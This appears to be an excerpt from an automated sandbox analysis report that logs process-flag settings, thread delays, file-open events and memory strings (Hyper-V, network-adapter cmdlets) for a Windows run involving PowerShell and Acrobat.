      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5651Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4044Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6380Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3344Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -13835058055282155s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 6380 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 3344 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7452Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: svchost.exe, 00000009.00000002.2580656710.0000014B3DE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000009.00000002.2582164673.0000014B43441000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2582217862.0000014B43454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E3412BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
